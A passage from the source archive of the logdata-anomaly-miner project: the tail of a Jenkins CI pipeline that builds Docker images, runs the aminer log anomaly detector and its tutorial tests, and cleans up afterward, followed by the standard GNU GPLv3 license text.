--build-arg=vardistri=ubuntu:20.04 ." sh "mkdir -p /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/ubuntu-2004-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Fedora Docker") { steps { script { fedoraimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_fed -t aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." sh "mkdir -p /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-fedora-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("RedHat Docker") { steps { script { redhatimage = true } sh "docker build -f aecid-testsuite/docker/Dockerfile_red -t aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID --build-arg=varbranch=development ." sh "mkdir -p /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && mkdir /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/persistency && mkdir /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs" sh "cp aecid-testsuite/demo/aminer/access.log /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/logs/" sh "cp -r source/root/etc/aminer /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg" sh "cp /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/template_config.yml /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/config.yml" sh "cp /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-available/generic/ApacheAccessModel.py /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID/aminercfg/conf-enabled" sh "cd /tmp/simplerun-redhat-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "docker run -v $PWD/persistency:/var/lib/aminer -v $PWD/logs:/logs --rm -t aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID aminer" } } stage("Build Documentation") { when { expression { BRANCH_NAME == "main" || BRANCH_NAME == "development" } } environment { BUILDDOCSDIR = sh(script: 'mktemp -p $WORKSPACE_TMP -d | tr -d [:space:]', returnStdout: true) } steps { script { docsimage = true } sh "docker build -f Dockerfile -t aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID ." sh "chmod 777 ${env.BUILDDOCSDIR}" sh "chmod g+s ${env.BUILDDOCSDIR}" sh "docker run --rm -v ${env.BUILDDOCSDIR}:/docs/_build aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID mkdocs" sh "scripts/deploydocs.sh ${env.BRANCH_NAME} ${env.BUILDDOCSDIR}/html /var/www/aeciddocs/logdata-anomaly-miner" } } stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut development" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted development" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector development" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector development" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector development" } } stage("EntropyDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToEntropyDetector development" } } } } stage("Wiki Tests - main") { when { branch "main" } parallel { stage("Try It Out") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runTryItOut main" } } stage("Getting Started") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runGettingStarted main" } } stage("Sequence Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnSequenceDetector main" } } stage("Frequency Detector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToCreateYourOwnFrequencyDetector main" } } stage("MissingMatchPathDetector") { steps { sh "docker run -m=2G --rm aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID runHowToMissingMatchPathValueDetector main" } } } } } post { always { script { sh "docker rmi aecid/logdata-anomaly-miner-testing:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" if( debianbookwormimage == true ) { sh "docker rmi aecid/aminer-debian-bookworm:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bookworm-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbullseyeimage == true ) { sh "docker rmi aecid/aminer-debian-bullseye:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-bullseye-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( debianbusterimage == true ) { sh "docker rmi aecid/aminer-debian-buster:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/simplerun-buster-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( productionimage == true ) { sh "docker rmi aecid/aminer-production:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" sh "cd / && test -d /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID && rm -rf /tmp/production-$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu22image == true ) { sh "docker rmi aecid/aminer-ubuntu-2204:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( ubuntu20image == true ) { sh "docker rmi aecid/aminer-ubuntu-2004:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( fedoraimage == true ) { sh "docker rmi aecid/aminer-fedora:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( redhatimage == true ) { sh "docker rmi aecid/aminer-redhat:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } if( docsimage == true){ sh "docker rmi aecid/aminer-docs:$JOB_BASE_NAME-$EXECUTOR_NUMBER-$BUILD_ID" } } } success { setBuildStatus("Build succeeded", "SUCCESS"); } failure { setBuildStatus("Build failed", "FAILURE"); } } } logdata-anomaly-miner-2.8.0/LICENSE000066400000000000000000001045131500476301700167160ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper 